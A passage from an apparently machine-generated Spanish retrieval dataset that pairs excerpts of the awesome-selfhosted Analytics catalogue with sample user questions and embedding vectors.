-0.03566, 0.0713, -0.13195, 0.2483, 0.02437, -0.04227, 0.07249, 0.04864, -0.11947, 0.01073, -0.05016, -0.04471, 0.0248, 0.01667, 0.10695, -0.02809, 0.09222, -0.03234, 0.01606, 0.06001, 0.06487, -0.00866, 0.05888, -0.03331, 0.02664, -0.03114, -0.0358, -0.09139, 0.04017, -0.01519, 0.02601, 0.0153, -0.11524, -0.03915, -0.05324, 0.05304, -0.02229, -0.04135, 0.09522, -0.01515, 0.01642, 0.03316, -0.00615, -0.01921, -0.01138, 0.06595, -0.00041, -0.02988, 0.09707, 0.05059, 0.10571, 0.02762, -0.01858, -0.04273, -0.07849, -0.04908, 0.00167, -0.05686, -0.07579, -0.03285, -0.02456, -0.14766, 0.00655, -0.01951, -0.00422, 0.05878, 0.03889, -0.02708, 0.00289, -0.0253, -0.0881, 0.03628, 0.11716, 0.02892, 0.00279, 0.01337, -0.0011, -0.04484, 0.00745, -0.03036, 0.1081, -0.06994, -0.02349, -0.06251, -0.10843, 0.05514, 0.0997, 0.01509, 0.0515, -0.00015, 0.02675, 0.00973, 0.03552, -0.03921, 0.01254, -0.01464, 0.07509, 0.06641, 0.01872, -0.08824, -0.03023, 0.06931, -0.06721, -0.01938, 0.10661, -0.0107, 0.04123, -0.00546, 0.02409, 0.05454, 0.0044, -0.00735, -0.02143, 0.03799, 0.01003, -0.02163, 0.02417, 0.0443, -0.0764, 0.03236, -0.00624, -0.03451, -0.07773, 0.0011, -0.06295, -0.01159, -0.09424, -0.01752, 0.02031, 0.00863, -0.00243, -0.02429, -0.05631, 0.05591, 0.04253, 0.08482, 0.10193, 0.05836, -0.02309, 0.02782, -0.06577, 0.05187, -0.03228, 0.01787, -0.02138, -0.06251, 0.05722, -0.02137, -0.00711, -0.04363, 0.10676, -0.05352, 0.0662, 0.05302, 0.00277, 0.06404, -0.02171, 0.06701, -0.05804, -0.04918, 0.0754, 0.06128, -0.03218, -0.02158, -0.01623, 0.04019, 0.0497, 0.04688, -0.0063, -0.01252, -0.03638, 0.01333, -0.01054, 0.05452, 0.03047, 0.01764, 0.07355, 0.03878, 0.00411, -0.00076, 0.02476, -0.0318, -0.02988, -0.05856, -0.01986, 0.04077, 0.08281, -0.03649, -0.03634, 0.06041, -0.01838, -0.07547, 0.03201, 0.01341, -0.11996, -0.08119, 0.0209, 0.01729, -0.03781, -0.00389, -0.0379]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "ΒΏquΓ© herramienta sirve para analizar estadΓ­sticas de visitas a mi web sin rastrear datos personales?", "v": [0.01289, 0.08641, -0.03391, -0.24609, 0.04825, -0.13398, -0.05548, -0.16215, -0.04932, 0.01829, -0.0034, -0.15385, -0.03474, -0.05334, 0.15383, -0.009, 0.11071, -0.00721, 0.1183, -0.01196, 0.00776, -0.06996, -0.08134, -0.00802, -0.14622, -0.0398, 0.04221, -0.05529, -0.15355, 0.04308, -0.05764, 0.02506, -0.05564, -0.01486, -0.08684, 0.06326, 0.03175, 0.01771, -0.04635, -0.04225, 0.03449, -0.01345, -0.00101, 0.02187, 0.06975, 0.00641, -0.16042, 0.03053, 0.0079, 0.01073, -0.01004, 0.00204, -0.04813, -0.05377, 0.00724, -0.0848, 0.14221, -0.08098, 0.13251, -0.08055, -0.07162, -0.01707, 0.00706, 0.02194, -0.00889, -0.077, 0.08364, -0.03489, -0.08064, 0.05577, 0.04208, 0.11301, -0.01892, -0.00168, 0.07221, -0.0544, 0.12782, 0.1321, 0.08355, 0.04535, -0.00639, -0.0218, -0.12041, 0.05009, -0.03081, 0.06651, 0.05961, -0.03324, 0.06203, -0.04605, 0.07667, 0.08828, -0.06217, 0.00219, 0.00074, 0.09114, 0.11003, -0.10663, -0.03218, -0.03614, 0.04386, -0.03476, -0.08988, 0.04591, 0.03323, 0.09629, -0.02323, -0.00786, -0.15084, 0.00392, 0.02867, -0.00299, -0.08144, -0.03751, 0.07045, 0.00147, -0.01827, -0.05403, -0.04192, -0.09828, 0.04999, 0.06012, -0.04171, -0.06279, -0.1405, -0.05794, -0.00358, 0.03631, 0.01902, -0.02134, 0.01745, -0.06209, -0.10408, 0.0446, 0.0106, 0.03486, -0.06425, -0.16175, 0.06387, -0.02171, 0.02817, 0.02399, -0.12429, -0.03905, 0.05024, -0.03266, 0.06933, 0.05797, -0.13692, -0.05369, 0.01114, -0.00063, 0.04159, 0.02287, -0.00647, -0.01127, -0.03799, -0.06573, -0.11151, -0.02843, 0.02874, 0.00081, 0.0476, 0.05729, 0.09202, 0.00779, 0.05747, 0.01142, 0.11738, 0.04487, -0.00134, 0.01384, 0.01443, -0.11472, 0.07222, -0.01818, -0.04379, -0.05014, -0.05685, -0.05095, 0.04242, -0.0754, 0.01293, -0.04286, 0.00966, 0.02084, 0.00992, -0.06343, -0.00494, 0.05067, 0.00274, 0.00914, 0.05875, -0.0294, 0.11559, 0.01824, 0.0316, 0.00843, 0.05011, -0.02014, -0.01505, -0.02532, -0.04933, 0.03412, -0.02538, 0.08791, -0.03948, -0.08131, 0.02611, -0.05122, -0.02298, -0.00184, -0.00702, -0.08318, -0.038, -0.04476, 0.04474, 0.01433, 0.00187, -0.01668, -0.0255, 0.03472, 0.05967, -0.0154, -0.01161, 0.06049, 0.02726, -0.0234, 0.00555, -0.04723, 0.00183, -0.01782, 0.00394, 0.04793, -0.01409, -0.08308, -0.03984, -0.02526, -0.03987, -0.04029, 0.00291, 0.03583, -0.00013, -0.01505, -0.00148, -0.04975, -0.04385, 0.00989, -0.03191, -0.11571, -0.02597, -0.05393, 0.03118, -0.00035, 0.03372, -0.01103]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "con quΓ© puedo montar un panel de control para ver mΓ©tricas de rendimiento de mi equipo en lugar del estΓ‘ndar DORA?", "v": [0.09967, 0.05705, -0.16048, -0.17363, -0.07128, 0.05864, -0.03042, 0.08534, -0.06747, -0.1198, -0.06242, -0.02749, 0.09765, -0.18537, 0.05465, 0.14538, 0.06839, -0.07176, 0.01488, -0.01725, 0.00333, -0.17308, -0.02481, -0.08487, 0.03776, 0.10363, 0.10185, -0.00957, -0.19427, -0.07093, 0.0526, 0.07006, 0.04289, -0.03831, 0.0075, -0.14212, -0.0215, 0.04961, 0.07135, 0.00537, -0.18215, -0.02533, 0.09703, -0.02769, 0.23927, -0.00568, 0.01374, 0.02697, -0.03524, -0.07994, 0.01124, 0.04399, 0.05184, 0.05919, -0.08044, -0.01977, 0.03396, 0.00286, 0.14422, -0.14051, -0.02222, -0.01392, -0.11314, 0.02372, 0.01605, 0.06586, -0.11702, -0.01667, -0.10138, -0.02667, 0.04031, -0.07858, -0.03133, -0.06404, 0.00453, 0.0872, -0.01501, 0.02539, 0.06825, -0.02655, 0.03103, 0.01715, -0.11283, 0.08507, -0.07069, -0.00228, -0.01119, -0.13224, 0.02653, -0.03973, 0.00876, -0.01718, -0.10813, -0.02769, -0.14876, -0.08801, 0.05191, 0.10174, -0.01583, 0.0237, -0.03578, 0.03418, 0.00819, 0.13424, 0.10538, 0.01315, 0.0665, 0.0004, 0.03108, -0.07462, 0.08786, 0.0005, -0.08361, 0.07355, -0.02968, -0.02972, -0.08564, 0.0443, -0.10208, 0.01333, -0.02026, 0.0035, 0.02925, -0.07183, 0.03805, -0.0596, 0.14111, 0.04317, 0.06285, 0.01474, -0.00357, 0.01718, 0.00075, 0.01041, -0.03624, 0.08343, -0.00988, -0.00543, -0.09126, 0.02398, -0.02252, 0.06249, -0.01343, -0.02445, 0.05521, -0.08888, 0.01322, -0.01294, -0.05921, 0.04255, 0.05306, 0.12371, 0.05723, -0.01882, -0.04107, -0.03853, 0.03814, 0.0287, 0.03908, 0.03758, -0.01503, 0.03905, 0.00652, 0.06321, 0.06388, -0.02422, 0.03898, -0.0191, 0.08537, 0.03321, -0.052, -0.00442, -0.00239, -0.09062, 0.05746, 0.02592, 0.04295, -0.03864, 0.0782, -0.00814, -0.00361, 0.00155, 0.01416, 0.0198, 0.02929, 0.00543, 0.02565, 0.02777, 0.00907, 0.07039, -0.01389, 0.04278, 0.05997, -0.07001, -0.01822, -0.03785, -0.0136, -0.02711, -0.04803, -0.05049, -0.00988, -0.0113, 0.01668, 0.02385, 0.0207, 0.03614, -0.02192, 0.07268, -0.00958, 0.03494, 0.07951, 0.07099, -0.02283, -0.04734, -0.04635, -0.00966, 0.03537, -0.03765, 0.0072, 0.02034, 0.05963, 0.02423, 0.05574, -0.01241, 0.00072, -0.01254, -0.01054, 0.02905, 0.01002, 0.01333, 0.03563, 0.07413, -0.01942, 0.01765, -0.00307, -0.00586, 0.0172, -0.03256, 0.00703, -0.0657, 0.0097, 0.03062, 0.00816, -0.05121, 0.00965, 0.01843, -0.03918, 0.0173, -0.00353, -0.07224, -0.01705, -0.00366, 0.02089, -0.03798, 0.01, -0.04938]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: GoatCounter β€” Easy web statistics without tracking of personal data [EUPL-1.2, Go]. HitKeep β€” Privacy-first web analytics with goals, funnels, ecommerce tracking, and team management in a single binary with embedded DuckDB (alternative to Google Analytics, Plausible, Umami) [MIT, Go/Docker]. Litlyx β€” All-in-one Analytics Solution. Setup in 30 seconds. Display all your data on an AI-powered dashboard. Fully self-hostable and GDPR compliant [Apache-2.0, Docker]. Liwan β€” Privacy-first web analytics [Apache-2.0, Rust/Docker]. Matomo β€” Web analytics that protects your data and your customers' privacy (alternative to Google Analytics) [GPL-3.0, PHP]. Medama Analytics β€” Privacy-first website analytics. Tiny, simple, and cookie-free [Apache-2.0/MIT, Docker/Go]. Metabase β€” Easy way for everyone in your company to ask questions and learn from data [AGPL-3.0, Java/Docker]. Middleware β€” Tool designed to help engineering leaders measure and analyze the effectiveness of their teams using the DORA metrics [Apache-2.0, Docker/Python/Nodejs].", "indexar": "que programa hay para hacer grΓ‘ficos y responder preguntas sobre los datos de la empresa sin instalar software complejo?", "v": [-0.02327, 0.10613, -0.04179, -0.27346, 0.10294, -0.20868, 0.0272, -0.11617, -0.12969, -0.02969, -0.02848, -0.07458, -0.05447, -0.1206, 0.05557, -0.03745, 0.01735, -0.2135, 0.01599, 0.02301, 1e-05, -0.03416, -0.06134, -0.10098, -0.1568, 0.04841, 0.02736, -0.07001, -0.11406, 0.06289, 0.07367, -0.02235, -0.00254, -0.04549, -0.11655, 0.02054, 0.0337, -0.00988, 0.07534, -0.03953, 0.00412, -0.0818, -0.00131, 0.04306, 0.13531, -0.037, -0.00353, -0.05765, 0.04014, -0.07641, -0.04633, 0.04731, -0.00402, -0.07085, 0.04254, -0.13503, 0.03178, -0.10642, 0.078, 0.03537, -0.04236, 0.12744, 0.03872, 0.05861, 0.00862, 0.0193, 0.09144, -0.03955, -0.04651, -0.00659, 0.0035, -0.02997, -0.0515, -0.05482, 0.06388, 0.03223, -0.03085, 0.00564, -0.03495, -0.0027, -0.02203, 0.00411, -0.00154, 0.05405, -0.09585, -0.0613, 0.02134, 0.03344, -0.09009, -0.0757, 0.03213, 0.02854, -0.04952, 0.08353, 0.03106, -0.04834, 0.15576, 0.03171, 0.05042, 0.10914, -0.03894, 0.01203, -0.0425, 0.08002, -0.09146, 0.0678, 0.02201, -0.1058, -0.11471, -0.00017, -0.06304, -0.00959, -0.02509, -0.0491, -0.02227, -0.05471, 0.07424, -0.0673, -0.0282, 0.02104, -0.03291, 0.00033, 0.04109, -0.01134, -0.00486, -0.08761, 0.0237, 0.13683, -0.01232, 0.03642, -0.0299, -0.05643, -0.07826, -0.0188, -0.02135, 0.01511, 0.02472, -0.02286, 0.05291, -0.08957, 0.00179, 0.09552, 0.01585, 0.00433, 0.07349, 0.05495, -0.03395, -0.03542, -0.04015, 0.04544, 0.01938, 0.05632, -0.00331, 0.07665, -0.07818, -0.01346, 0.10934, -0.07757, 0.03083, 0.04441, -0.00916, 0.03201, -0.04073, 0.04265, 0.03112, -0.06411, -0.07439, 0.01062, 0.06515, 0.06468, -0.05642, 0.10831, 0.04252, -0.07821, 0.03951, -0.00642, -0.02847, -0.10099, -0.02491, -0.07587, -0.07315, 0.03421, 0.09783, 0.02519, -0.04076, -0.05188, -0.00578, -0.04005, 0.00159, -0.01018, 0.00457, 0.07093, -0.00827, -0.03487, 0.06193, -0.03462, -0.04407, 0.00403, 0.02957, -0.01632, -0.0697, 0.06335, -0.08358, -0.00222, 0.05017, 0.15148, 0.01706, 0.04646, 0.08013, 0.05558, 0.00089, -0.00156, 0.054, -0.00663, -0.05302, -0.1002, 0.03824, 0.03214, 0.06092, 0.0583, 0.00557, 0.02956, 0.05382, 0.00414, -0.07514, -0.03271, 0.06008, 0.07853, 0.02182, 0.00794, -0.02399, 0.0394, -0.01887, -0.02295, -0.001, 0.02256, -0.00229, -0.05663, -0.00951, -0.08318, 0.0623, 0.08584, -0.02478, -0.04116, -0.0623, -0.03379, -0.04002, 0.02073, 0.01897, -0.05213, -0.07036, -0.0011, 0.03177, -0.03218, 0.00618, 0.01327]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "quΓ© herramienta visualiza modelos de redes neuronales o aprendizaje automΓ‘tico?", "v": [0.04129, -0.03255, -0.12309, -0.19176, -0.03065, 0.00197, -0.21081, -0.04587, -0.0317, -0.12382, 0.00813, -0.17247, -0.02205, 0.00519, 0.04784, 0.09894, 0.05259, -0.11244, 0.01216, 0.09578, -0.0841, -0.09466, -0.12485, -0.02425, 0.00891, 0.07207, 0.01776, 0.05184, -0.06393, 0.13597, -0.09254, 0.01882, 0.10504, -0.11695, -0.17483, 0.0266, -0.00968, 0.02076, -0.05098, 0.00718, -0.05622, 0.14212, -0.11457, 0.01463, 0.12395, 0.0918, -0.09385, -0.01378, -0.05599, 0.00601, 0.04505, 0.03452, -0.04325, -0.00464, 0.0266, -0.12998, 0.2035, -0.01027, 0.04316, -0.13032, -0.02395, -0.03365, 0.00284, -0.02811, -0.02378, -0.05821, 0.09876, 0.042, -0.10799, 0.09038, 0.02496, -0.01517, 0.08308, -0.05891, 0.05653, 0.06482, -0.09112, -0.01792, 0.11358, -0.02942, 0.04425, -0.06334, -0.09985, 0.03448, 0.01591, 0.05771, 0.00579, -0.03744, -0.00653, -0.07359, -0.08608, 0.08867, -0.0481, -0.0293, 0.0173, 0.08905, -0.01298, -0.10569, 0.01117, 0.00214, 0.00336, -0.06012, -0.06256, 0.09365, -0.03222, -0.02653, -0.0041, -0.00238, -0.06308, -0.07093, 0.09249, 0.04439, -0.0504, 0.00262, -0.0378, 0.10411, 0.05388, 0.06768, 0.0467, -0.02882, 0.06423, 0.06142, -0.01263, -0.04299, -0.04048, 0.02157, -0.01177, 0.12175, 0.05062, -0.03437, 0.02085, -0.03565, -0.00988, -0.06425, -0.02016, 0.02635, -0.06417, -0.04887, -0.06602, -0.09766, -0.01994, -0.04229, -0.00975, -0.11387, -0.06811, 0.00684, 0.0843, -0.10592, -0.02578, 0.01495, -0.00501, 0.0024, 0.05179, -0.10176, -0.02326, 0.02767, -0.08856, -0.00874, -0.01956, 0.02644, -0.03068, 0.05355, 0.07837, 0.07281, 0.02071, -0.02521, -0.06923, 0.08226, 0.05475, 0.07124, -0.02617, 0.03289, -0.04352, 0.00433, -0.0326, -0.00181, -0.04845, 0.03212, -0.03211, -0.05419, -0.07423, 0.02184, -0.00231, -0.0441, 0.05413, -0.07903, 0.00891, -0.01439, -0.01152, 0.0254, -0.06963, 0.02314, 0.00731, -0.05398, 0.18274, -0.04396, -0.03102, 0.03211, 0.05934, -0.00022, -0.02946, 0.03837, 0.01214, -0.04295, -0.04081, 0.04883, 0.03673, 0.00999, -0.01777, 0.07709, -0.04075, -0.03203, 0.02367, -0.04574, 0.02045, 0.00566, -0.00184, -0.01828, -0.01413, -0.00787, 0.04989, 0.00452, 0.03285, 0.04481, -0.09274, 0.03766, -0.04005, 0.08799, -0.01068, -0.04264, 0.02379, -0.01834, -0.04204, -0.0228, 0.01727, -0.03424, -0.00204, -0.01526, -0.04231, -0.00447, 0.01449, 0.01341, -0.01654, -0.00662, -0.02169, -0.08505, -0.0339, -0.00953, -0.00017, -0.07159, -0.04056, -0.01271, 0.06863, -0.08082, -0.00059, -0.0037]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "con quΓ© puedo montar una alternativa libre y ligera para anΓ‘lisis web que respete la privacidad?", "v": [-0.07752, 0.02886, -0.18614, -0.12273, -0.09349, -0.02926, -0.04612, 0.03179, -0.22392, -0.13133, 0.06891, -0.15457, 0.12796, 0.00514, 0.19002, 0.04045, 0.00647, -0.00645, 0.11026, -0.0732, -0.06373, -0.08726, -0.14814, -0.1522, -0.03869, -0.04672, 0.12727, 0.04564, -0.02835, 0.02963, -0.07097, 0.08553, 0.00581, 0.1142, -0.00239, 0.12711, 0.15211, 0.03937, 0.08939, -0.0386, 0.11898, -0.11103, 0.03622, 0.14927, 0.05269, -0.01124, -0.09271, 0.00881, 0.01484, 0.01803, -0.01639, 0.05155, -0.02655, -0.01354, 0.0459, 0.00691, 0.15664, -0.09669, 0.13518, 0.00463, -0.07452, 0.15849, 0.06888, 0.06754, 0.04044, -0.03448, -0.05613, 0.0174, -0.07029, 0.07218, 0.09529, -0.05604, -0.03784, -0.02008, -0.10098, 0.02821, -0.07844, 0.03833, 0.00844, 0.09495, 0.05429, -0.05114, -0.0233, 0.07148, -0.05731, -0.02606, 0.06046, -0.12454, 0.02033, -0.00379, 0.13051, 0.07884, -0.07939, 0.04499, 0.00398, -0.10579, 0.02531, 0.078, -0.03376, -0.04196, 0.03238, 0.07202, -0.05714, 0.02173, 0.07934, 0.02671, 0.02835, -0.02278, -0.05163, -0.06102, 0.02316, 0.04644, -0.12177, -0.01989, 0.00798, -0.06669, -0.08363, 0.03588, -0.01413, -0.03938, -0.03605, -0.02149, -0.01511, -0.08089, 0.00831, 0.0234, 0.03343, 0.08839, -0.05579, 0.02802, -0.00792, -0.02919, -0.06527, -0.03679, -0.00391, 0.02055, -0.07325, -0.02739, 0.0124, 0.03869, 0.0841, -0.01976, -0.03156, 0.01763, 0.0612, -0.03582, 0.00571, -0.05644, -0.03061, -0.0305, 0.03104, 0.06626, -0.01598, 0.08996, -0.03114, 0.02177, -0.0549, -0.0564, 0.01952, 0.08391, 0.04709, 0.04578, -0.03283, 0.00272, 0.05837, 0.03112, -0.00378, -0.06099, -0.04128, 0.04679, -0.03169, 0.02518, 0.00709, -0.08894, 0.14485, -0.02444, -0.05249, -0.07191, 0.06341, -0.06592, 0.02985, 0.00205, -0.04419, -0.00198, -0.03403, -0.00793, 0.04774, -0.01275, 0.00071, 0.03371, -0.07418, 0.06598, -0.04408, 0.00344, 0.06427, -0.02263, 0.0178, -0.0393, 0.04036, 0.02728, 0.00605, -0.03765, -0.0295, -0.01019, -0.05123, 0.01609, -0.03559, 0.01047, 0.03138, 0.01539, 0.04037, 0.00389, 0.05519, -0.07749, -0.02782, 0.00903, 0.0485, -0.01585, -0.03062, 0.02778, 0.01757, 0.04334, 0.0481, 0.02355, 0.01917, 0.04617, 0.02238, 0.00078, 0.01799, -0.00119, 0.01999, 0.01425, -0.01165, 0.0101, 0.03372, -0.03098, -0.02695, 0.00742, -0.02961, -0.00665, 0.04403, 0.0412, -0.03861, -0.01797, -0.00049, -0.02276, -0.09414, 0.03918, -0.01519, -0.08125, -0.07058, 0.01669, -0.00452, -0.02512, -0.00727, 0.01955]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Netron β€” Visualizer for neural network and machine learning models [MIT, Python/Nodejs]. Offen β€” Fair, lightweight and open web analytics tool. Gain insights while your users have full access to their data [Apache-2.0, Go/Docker]. Plausible Analytics β€” Simple, lightweight (< 1 KB) and privacy-friendly web analytics [AGPL-3.0, Elixir]. PostHog β€” Product analytics, session recording, feature flagging and a/b testing that you can self-host (alternative to Mixpanel, Amplitude, Heap, HotJar, Optimizely) [MIT, Python]. Postiz β€” Schedule posts, track the performance of your content, and manage all your social media accounts in one place (Alternative to Buffer, Hootsuite, Sprout Social) [⚠, AGPL-3.0, Docker]. Prisme Analytics β€” Privacy-focused and progressive analytics service based on Grafana [AGPL-3.0/MIT, Docker]. Redash β€” Connect and query your data sources, build dashboards to visualize data and share them with your company [BSD-2-Clause, Docker].", "indexar": "cuΓ‘l es un programa autoalojable para product analytics y grabaciΓ³n de sesiones como Mixpanel?", "v": [0.18516, 4e-05, -0.03912, -0.23758, 0.01617, -0.12704, 0.00559, -0.03313, -0.12747, -0.03788, -0.10599, -0.07385, -0.03271, -0.0002, 0.03153, 0.04613, -0.00579, -0.1525, 0.01215, 0.1008, -0.04256, 0.04475, -0.1079, -0.09278, -0.0205, 0.10708, 0.20741, -0.0334, -0.08097, 0.05882, 0.02368, -0.01544, 0.02896, -0.11193, -0.02593, -0.10229, 0.02561, 0.05843, -0.02857, 0.05801, -0.09814, -0.06965, -0.03021, -0.04388, 0.12317, 0.06642, 0.06669, 0.09253, -0.12672, -0.03665, -0.0222, 0.05208, -0.08293, 0.08887, 0.02703, -0.14823, 0.09271, -0.17449, 0.07708, -0.02565, 0.07111, 0.0571, -0.00303, 0.00536, 0.08001, 0.00614, -0.02784, 0.00921, -0.03967, 0.05328, -0.04613, -0.03306, -0.01912, -0.01969, 0.1462, 0.00945, -0.09132, -0.01898, -0.0531, -0.08499, -0.00511, -0.10372, 0.02736, 0.07317, -0.12364, 0.10879, 0.0635, -0.09662, -0.10767, -0.01639, -0.00542, 0.03617, -0.03998, 0.00242, 0.07514, -0.05187, 0.14761, 0.01935, -0.03319, -0.01051, 0.10012, -0.01446, -0.03399, 0.12051, -0.01986, 0.09877, -0.02457, -0.00666, -0.04341, 0.01356, -0.06454, 0.12486, -0.05201, -0.02961, -0.04231, 0.01611, -0.00141, 0.04802, -0.04923, 0.00187, 0.02736, 0.02185, -0.07954, -0.11205, -0.0475, 0.01237, 0.00221, 0.04206, 0.01467, 0.05143, -0.0009, -0.01292, -0.00714, -0.00745, 0.0083, -0.01373, 0.02476, 0.06012, -0.04257, -0.07897, 0.05628, 0.10941, 0.06173, 0.01912, 0.1317, -0.02587, -0.03053, -0.0128, -0.0057, 0.11589, 0.00808, 0.04848, -0.01586, -0.03608, -0.01211, -0.05951, 0.01694, -0.10309, -0.02696, -0.00291, -0.0385, -0.01404, 0.02182, -0.0066, 0.12141, -0.02959, -0.0513, 0.03384, 0.02521, 0.00585, -0.01084, 0.02465, 0.0496, -0.07063, -0.01632, -0.02182, -0.01546, -0.07588, 0.0865, -0.11464, -0.11507, 0.043, 0.04731, 0.0327, 0.00911, 0.05066, -0.02579, 0.00653, 0.07528, 0.00892, 0.00601, 0.06033, -0.01761, -0.0164, 0.02624, -0.06922, -0.03808, -0.01228, -0.00898, 0.06067, -0.0747, -0.03607, -0.0367, -0.04337, 0.03958, 0.03651, -0.08954, 0.01472, 0.05978, 0.01982, -0.02685, 0.0035, 0.04092, -0.03977, -0.05512, 0.02507, 0.00114, 0.03533, 0.01413, 0.04988, 0.04642, 0.04471, 0.04265, 0.05043, -0.04891, -0.02818, 0.06755, 0.03768, -0.00265, -0.04657, -0.02257, -0.02086, -0.03294, 0.00912, 0.03028, 0.08278, -0.02028, -0.04031, -0.0049, -0.0293, -0.00152, 0.05076, -0.01779, -0.02425, -0.00359, -0.01744, -0.02537, 0.06141, 0.01818, -0.07808, -0.01713, 0.03564, 0.04246, -0.00953, 0.06777, -0.00413]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "que herramienta sirve para crear dashboards de anΓ‘lisis web sin usar Google Analytics", "v": [0.05553, 0.03744, -0.15387, -0.21115, 0.02189, -0.12478, -0.03773, -0.04298, -0.01265, 0.05531, -0.12767, -0.15193, -0.11997, -0.05542, -0.00616, 0.06833, 0.06308, -0.15335, -0.03782, -0.01815, -0.01137, -0.00368, -0.11726, -0.05322, -0.09315, -0.05811, 0.01538, -0.06013, -0.20031, 0.09498, -0.03695, 0.01609, -0.0727, -0.0242, -0.17077, -0.09694, -0.04699, 0.05755, -0.05181, 0.0099, -0.04237, 0.01595, -0.09865, 0.05885, 